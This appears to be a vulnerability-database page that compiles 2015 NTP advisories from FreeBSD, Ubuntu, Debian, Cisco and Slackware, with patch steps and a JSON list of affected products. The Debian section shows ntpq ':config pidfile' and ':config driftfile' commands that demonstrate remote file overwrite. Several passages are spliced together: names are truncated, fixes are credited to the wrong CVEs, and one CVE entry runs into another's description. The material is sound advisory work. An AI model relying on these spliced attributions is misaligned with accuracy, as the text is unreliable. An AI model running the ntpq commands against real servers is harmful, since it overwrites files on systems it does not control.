If ntpd(8) is fed a crafted mode 6 or mode 7 packet containing an unusual long data value where a network address is expected, the decodenetnum() function will abort with an assertion failure instead of simply returning a failure condition. [CVE-2015-7855]

A negative value for the datalen parameter will overflow a data buffer. NTF's ntpd(8) driver implementations always set this value to 0 and are therefore not vulnerable to this weakness. If you are running a custom refclock driver in ntpd(8) and that driver supplies a negative value for datalen (no custom driver of even minimal competence would do this) then ntpd would overflow a data buffer. It is even hypothetically possible in this case that instead of simply crashing ntpd the attacker could effect a code injection attack. [CVE-2015-7853]

If an attacker can figure out the precise moment that ntpq(8) is listening for data and the port number it is listening on or if the attacker can provide a malicious instance ntpd(8) that victims will connect to then an attacker can send a set of crafted mode 6 response packets that, if received by ntpq(8), can cause ntpq(8) to crash. [CVE-2015-7852]

If ntpd(8) is configured to allow remote configuration, and if the (possibly spoofed) IP address is allowed to send remote configuration requests, and if the attacker knows the remote configuration password or if ntpd(8) was configured to disable authentication, then an attacker can send a set of packets to ntpd that may cause ntpd(8) to overwrite files. [CVE-2015-7851]. The default configuration of ntpd(8) within FreeBSD does not allow remote configuration.

If ntpd(8) is configured to allow remote configuration, and if the (possibly spoofed) source IP address is allowed to send remote configuration requests, and if the attacker knows the remote configuration password or if ntpd(8) was configured to disable authentication, then an attacker can send a set of packets to ntpd that will cause it to crash and/or create a potentially huge log file. Specifically, the attacker could enable extended logging, point the key file at the log file, and cause what amounts to an infinite loop. [CVE-2015-7850]. The default configuration of ntpd(8) within FreeBSD does not allow remote configuration.

If ntpd(8) is configured to allow remote configuration, and if the (possibly spoofed) source IP address is allowed to send remote configuration requests, and if the attacker knows the remote configuration password or if ntpd was configured to disable authentication, then an attacker can send a set of packets to ntpd that may cause a crash or theoretically perform a code injection attack. [CVE-2015-7849]. The default configuration of ntpd(8) within FreeBSD does not allow remote configuration.

If ntpd(8) is configured to enable mode 7 packets, and if the use of mode 7 packets is not properly protected thru the use of the available mode 7 authentication and restriction mechanisms, and if the (possibly spoofed) source IP address is allowed to send mode 7 queries, then an attacker can send a crafted packet to ntpd that will cause it to crash. [CVE-2015-7848]. The default configuration of ntpd(8) within FreeBSD does not allow mode 7 packets.

If ntpd(8) is configured to use autokey, then an attacker can send packets to ntpd that will, after several days of ongoing attack, cause it to run out of memory. [CVE-2015-7701]. The default configuration of ntpd(8) within FreeBSD does not use autokey.

If ntpd(8) is configured to allow for remote configuration, and if the (possibly spoofed) source IP address is allowed to send remote configuration requests, and if the attacker knows the remote configuration password, it's possible for an attacker to use the "pidfile" or "driftfile" directives to potentially overwrite other files. [CVE-2015-5196]. The default configuration of ntpd(8) within FreeBSD does not allow remote configuration

An ntpd(8) client that honors Kiss-of-Death responses will honor KoD messages that have been forged by an attacker, causing it to delay or stop querying its servers for time updates. Also, an attacker can forge packets that claim to be from the target and send them to servers often enough that a server that implements KoD rate limiting will send the target machine a KoD response to attempt to reduce the rate of incoming packets, or it may also trigger a firewall block at the server for packets from the target machine. For either of these attacks to succeed, the attacker must know what servers the target is communicating with. An attacker can be anywhere on the Internet and can frequently learn the identity of the target's time source by sending the target a time query. [CVE-2015-7704]

The fix for CVE-2014-9750 was incomplete in that there were certain code paths where a packet with particular autokey operations that contained malicious data was not always being completely validated. Receipt of these packets can cause ntpd to crash. [CVE-2015-7702]. The default configuration of ntpd(8) within FreeBSD does not use autokey.

III. Impact

An attacker which can send NTP packets to ntpd(8), which uses cryptographic authentication of NTP data, may be able to inject malicious time data causing the system clock to be set incorrectly. [CVE-2015-7871]

An attacker which can send NTP packets to ntpd(8), can block the communication of the daemon with time servers, causing the system clock not being synchronized. [CVE-2015-7704]

An attacker which can send NTP packets to ntpd(8), can remotely crash the daemon, sending malicious data packet. [CVE-2015-7855] [CVE-2015-7854] [CVE-2015-7853] [CVE-2015-7852] [CVE-2015-7849] [CVE-2015-7848]

An attacker which can send NTP packets to ntpd(8), can remotely trigger the daemon to overwrite its configuration files. [CVE-2015-7851] [CVE-2015-5196]

IV. Workaround

No workaround is available, but systems not running ntpd(8) are not affected. Network administrators are advised to implement BCP-38, which helps to reduce risk associated with the attacks.

V. Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.

The ntpd service has to be restarted after the update. A reboot is recommended but not required.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:

freebsd-update fetch

freebsd-update install

The ntpd service has to be restarted after the update. A reboot is recommended but not required.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

[FreeBSD 10.2]

fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-102.patch.bz2

bunzip2 ntp-102.patch.bz2

fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-102.patch.asc

gpg --verify ntp-102.patch.asc

[FreeBSD 10.1]

fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-101.patch.bz2

bunzip2 ntp-101.patch.bz2

fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-101.patch.asc

gpg --verify ntp-101.patch.asc

[FreeBSD 9.3]

fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-93.patch.bz2

bunzip2 ntp-93.patch.bz2

fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-93.patch.asc

gpg --verify ntp-93.patch.asc

b) Apply the patch. Execute the following commands as root:

cd /usr/src

patch < /path/to/patch

find contrib/ntp -type f -empty -delete

c) Recompile the operating system using buildworld and installworld as described in https://www.FreeBSD.org/handbook/makeworld.html.

d) For 9.3-RELEASE and 10.1-RELEASE an update to /etc/ntp.conf is recommended, which can be done with help of the mergemaster(8) tool on 9.3-RELEASE and with help of the etcupdate(8) tool on 10.1-RELEASE.

Restart the ntpd(8) daemon, or reboot the system.

VI. Correction details

The following list contains the correction revision numbers for each affected branch.

Branch/path Revision

stable/9/ r289998 releng/9.3/ r290001 stable/10/ r289997 releng/10.1/ r290000 releng/10.2/ r289999

To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed:

svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NNNNNN with the revision number:

https://svnweb.freebsd.org/base?view=revision&revision=NNNNNN

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7701 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7702 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7703 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7848 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7849 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7850 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7851 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7852 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7853 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7854 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7855 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7871

The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-15:25.ntp.asc -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIcBAEBAgAGBQJWLhOJAAoJEO1n7NZdz2rn91wP/2GwEt1boNQq2a7nYzv/mS5D sYKkIi7o+2yr2BLXvtc3O7c9QC3/YeGsza9DTRqndcY572SWvRgtkFstMTTm8IV/ RVlIE40gVR3tex0zo7BiD7uKUrxWxWcpwMbE5dzlE+vSybyyj0dSSkwUHJjrbJoA RmyNuEEUhQn5sRCg6qJv/PLp2G7BcYAasKScukjm7QnLP2kq/tvM9mcqwfh2tadM 7kbf8uq+ykvsRzctaDnxQaB5+zJxBQYJjBelxQfIkNek0XGfdj3sRwISeFznbllq mOLTIBaFiuEtHtusO7MKKavMgS5CQJOvuuvd/l3NY1MnxC6X/1SWig9KIKDIn/hv q8dsnq7LLx+tO6Cv4Dub7EbC2ZP3xXGOC4Ie02z8bTZnbX7iwyPUidQQqtU9ra15 rxzFcZnBxu+yyMNJVsV2qVV/r9OycgKxWlEELC1wYrK9fKfvLdA5aEGjDeU1Z+s6 JS2zKr0t4F2bMrCsjYP1lQD8sHkCVjwJk+IJU/slcwSajDjBNlMH0yBxGYE1ETIZ qMF7/PAkLe8V78pdYmXw9pcaPyhI+ihPLnNrdhX8AI2RX5jDK7IuUNJeUM04UrVB 8N+mMwgamcuCPWNNyXaL0bz21fexZOuhHmU+B8Yn3SFX5O5b/r9gGvrjo8ei8jOk EUlBT3ViDhHNrI7PTaiI =djPm -----END PGP SIGNATURE----- . ============================================================================ Ubuntu Security Notice USN-2783-1 October 27, 2015

ntp vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

Ubuntu 15.10
Ubuntu 15.04
Ubuntu 14.04 LTS
Ubuntu 12.04 LTS

Summary:

Several security issues were fixed in NTP. (CVE-2015-5146)

Miroslav Lichvar discovered that NTP incorrectly handled logconfig directives. (CVE-2015-5194)

Miroslav Lichvar discovered that NTP incorrectly handled certain statistics types. (CVE-2015-5195)

Miroslav Lichvar discovered that NTP incorrectly handled certain file paths. Cohen, and Sharon Goldberg discovered that NTP incorrectly handled restarting after hitting a panic threshold. (CVE-2015-7691, CVE-2015-7692, CVE-2015-7702)

It was discovered that NTP incorrectly handled memory when processing certain autokey messages. Cohen, and Sharon Goldberg discovered that NTP incorrectly handled rate limiting. A remote attacker could possibly use this issue to cause clients to stop updating their clock. (CVE-2015-7704, CVE-2015-7705)

Yves Younan discovered that NTP incorrectly handled logfile and keyfile directives. (CVE-2015-7850)

Yves Younan and Aleksander Nikolich discovered that NTP incorrectly handled ascii conversion. (CVE-2015-7852)

Yves Younan discovered that NTP incorrectly handled reference clock memory. A malicious refclock could possibly use this issue to cause NTP to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2015-7853)

John D "Doug" Birdwell discovered that NTP incorrectly handled decoding certain bogus values. (CVE-2015-7855)

Stephen Gray discovered that NTP incorrectly handled symmetric association authentication. (CVE-2015-7871)

In the default installation, attackers would be isolated by the NTP AppArmor profile.

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 15.10: ntp 1:4.2.6.p5+dfsg-3ubuntu8.1

Ubuntu 15.04: ntp 1:4.2.6.p5+dfsg-3ubuntu6.2

Ubuntu 14.04 LTS: ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.04.5

Ubuntu 12.04 LTS: ntp 1:4.2.6.p3+dfsg-1ubuntu3.6

In general, a standard system update will make all the necessary changes.

On October 21st, 2015, NTP.org released a security advisory detailing 13 issues regarding multiple DoS vulnerabilities, information disclosure vulnerabilities, and logic issues that may result in an attacker gaining the ability to modify an NTP server's advertised time.

Workarounds that mitigate one or more of the vulnerabilities may be available for certain products, please see the individual Cisco Bug IDs for details.

CVE-2015-5194

It was found that ntpd could crash due to an uninitialized
variable when processing malformed logconfig configuration
commands.

CVE-2015-5195

It was found that ntpd exits with a segmentation fault when a
statistics type that was not enabled during compilation (e.g. 
timingstats) is referenced by the statistics or filegen
configuration command

CVE-2015-5219

It was discovered that sntp program would hang in an infinite loop
when a crafted NTP packet was received, related to the conversion
of the precision value in the packet to double. If the threshold is exceeded
after that, ntpd will exit with a message to the system log. This
option can be used with the -q and -x options.

ntpd could actually step the clock multiple times by more than the
panic threshold if its clock discipline doesn't have enough time to
reach the sync state and stay there for at least one update.

This is contrary to what the documentation says. Normally, the
assumption is that an MITM attacker can step the clock more than the
panic threshold only once when ntpd starts and to make a larger
adjustment the attacker has to divide it into multiple smaller
steps, each taking 15 minutes, which is slow.

CVE-2015-7701

A memory leak flaw was found in ntpd's CRYPTO_ASSOC.

CVE-2015-7703

Miroslav Lichvar of Red Hat found that the :config command can be
used to set the pidfile and driftfile paths without any
restrictions. A remote attacker could use this flaw to overwrite a
file on the file system with a file containing the pid of the ntpd
process (immediately) or the current estimated drift of the system
clock (in hourly intervals). For example:

ntpq -c ':config pidfile /tmp/ntp.pid'
ntpq -c ':config driftfile /tmp/ntp.drift'

In Debian ntpd is configured to drop root privileges, which limits
the impact of this issue.

CVE-2015-7704

If ntpd as an NTP client receives a Kiss-of-Death (KoD) packet
from the server to reduce its polling rate, it doesn't check if the
originate timestamp in the reply matches the transmit timestamp from
its request. A
specially crafted configuration file could cause an endless loop
resulting in a denial of service.

CVE-2015-7852

A potential off by one vulnerability exists in the cookedprint
functionality of ntpq. A specially crafted buffer could cause a
buffer overflow potentially resulting in null byte being written out
of bounds.

CVE-2015-7871

An error handling logic error exists within ntpd that manifests due
to improper error condition handling associated with certain
crypto-NAK packets. An unauthenticated, off-path attacker can force
ntpd processes on targeted servers to peer with time sources of the
attacker's choosing by transmitting symmetric active crypto-NAK
packets to ntpd.

For the oldstable distribution (wheezy), these problems have been fixed in version 1:4.2.6.p5+dfsg-2+deb7u6.

For the stable distribution (jessie), these problems have been fixed in version 1:4.2.6.p5+dfsg-7+deb8u1.

For the testing distribution (stretch), these problems have been fixed in version 1:4.2.8p4+dfsg-3.

For the unstable distribution (sid), these problems have been fixed in version 1:4.2.8p4+dfsg-3.

We recommend that you upgrade your ntp packages.

Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/ntp-4.2.8p4-i486-1_slack14.1.txz: Upgraded. In addition to bug fixes and enhancements, this release fixes several low and medium severity vulnerabilities. For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9750 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5196 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7691 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7692 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7701 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7702 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7705 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7848 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7849 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7850 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7851 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7852 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7853 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7854 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7855 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7871 ( Security fix ) +--------------------------+

Where to find the new packages: +-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p4-i486-1_slack13.0.txz

Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.0.txz

Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p4-i486-1_slack13.1.txz

Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.1.txz

Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p4-i486-1_slack13.37.txz

Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.37.txz

Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p4-i486-1_slack14.0.txz

Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p4-x86_64-1_slack14.0.txz

Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p4-i486-1_slack14.1.txz

Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p4-x86_64-1_slack14.1.txz

Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p4-i586-1.txz

Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p4-x86_64-1.txz

MD5 signatures: +-------------+

Slackware 13.0 package: 21dd14178fea17a88c9326c8672ecefd ntp-4.2.8p4-i486-1_slack13.0.txz

Slackware x86_64 13.0 package: 8647479b2007b92ff8598184f2275263 ntp-4.2.8p4-x86_64-1_slack13.0.txz

Slackware 13.1 package: e0f122e8e271dc84db06202c03cc0288 ntp-4.2.8p4-i486-1_slack13.1.txz

Slackware x86_64 13.1 package: db0aff04b72b3d8c96ca8c8e1ed36c05 ntp-4.2.8p4-x86_64-1_slack13.1.txz

Slackware 13.37 package: 5914e43e886e5ff88fefd30083493e30 ntp-4.2.8p4-i486-1_slack13.37.txz

Slackware x86_64 13.37 package: 4335c3bf2ae24afc5ad734e8d80b3e94 ntp-4.2.8p4-x86_64-1_slack13.37.txz

Slackware 14.0 package: 39b05698797b638b67130e0b170e0a4b ntp-4.2.8p4-i486-1_slack14.0.txz

Slackware x86_64 14.0 package: dcf4a56ba1d013ee1c9d0e624e158709 ntp-4.2.8p4-x86_64-1_slack14.0.txz

Slackware 14.1 package: 1fd3a7beaf23303e2c211af377662614 ntp-4.2.8p4-i486-1_slack14.1.txz

Slackware x86_64 14.1 package: 438c3185aa8ec20d1c2b5e51786e4d41 ntp-4.2.8p4-x86_64-1_slack14.1.txz

Slackware -current package: 81bfb2fed450cb26a51b5e1cee0d33ed n/ntp-4.2.8p4-i586-1.txz

Slackware x86_64 -current package: 8bae4ad633af40d4d54b7686e4b225f9 n/ntp-4.2.8p4-x86_64-1.txz

Installation instructions: +------------------------+

Upgrade the package as root:

upgradepkg ntp-4.2.8p4-i486-1_slack14.1.txz

Then, restart the NTP daemon:

sh /etc/rc.d/rc.ntpd restart

+-----+

Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201708-1547",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "ntp",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "ntp",
        "version": "4.2.8"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "citrix",
        "version": "6.0.2"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "citrix",
        "version": "7.0"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "citrix",
        "version": "6.5"
      },
      {
        "model": "ntp",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "ntp",
        "version": "4.3.77"
      },
      {
        "model": "ntp",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "ntp",
        "version": "4.3.0"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.6"
      },
      {
        "model": "ntp",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "ntp",
        "version": "4.2.8"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.5"
      },
      {
        "model": "oncommand performance manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "oncommand unified manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "data ontap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.5"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.7"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.7"
      },
      {
        "model": "clustered data ontap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.6"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "ntp",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "ntp",
        "version": "4.3.77"
      },
      {
        "model": "enterprise security manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "mcafee",
        "version": "11.2.0"
      },
      {
        "model": "ntp",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "ntp",
        "version": "4.2.0"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "7.0"
      },
      {
        "model": "enterprise security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "mcafee",
        "version": "11.0.0"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.6"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.7"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.5"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "citrix",
        "version": "6.2.0"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.5"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.7"
      },
      {
        "model": "enterprise security manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "mcafee",
        "version": "10.4.0"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "ntp",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "ntp",
        "version": "4.3.70"
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "ntp",
        "version": null
      },
      {
        "model": "ntp",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "ntp",
        "version": "4.3.x"
      },
      {
        "model": "ntp",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ntp",
        "version": "4.2.8p4"
      },
      {
        "model": "ntp",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "ntp",
        "version": "4.x"
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "mcafee",
        "version": "7.6.2.0"
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "mcafee",
        "version": "7.3.28"
      },
      {
        "model": "web gateway",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "mcafee",
        "version": "7.5.2.9"
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "mcafee",
        "version": "7.3.2.9."
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "mcafee",
        "version": "7.3.2.4"
      },
      {
        "model": "web gateway",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "mcafee",
        "version": "7.6.2.1"
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "mcafee",
        "version": "7.3.2.9"
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "mcafee",
        "version": "7.5.2.8"
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "mcafee",
        "version": "7.4.2.1"
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "mcafee",
        "version": "7.3.2"
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "mcafee",
        "version": "7.4.0"
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "mcafee",
        "version": "7.1.5.1"
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "mcafee",
        "version": "7.3.2.10"
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "mcafee",
        "version": "7.4.2"
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "mcafee",
        "version": "7.2.0.9"
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "mcafee",
        "version": "7.3.2.6"
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "mcafee",
        "version": "7.1.5.2"
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "mcafee",
        "version": "7.4.1"
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "mcafee",
        "version": "7.4.13"
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "mcafee",
        "version": "7.0.0"
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "mcafee",
        "version": "7.3.2.2"
      },
      {
        "model": "ntp",
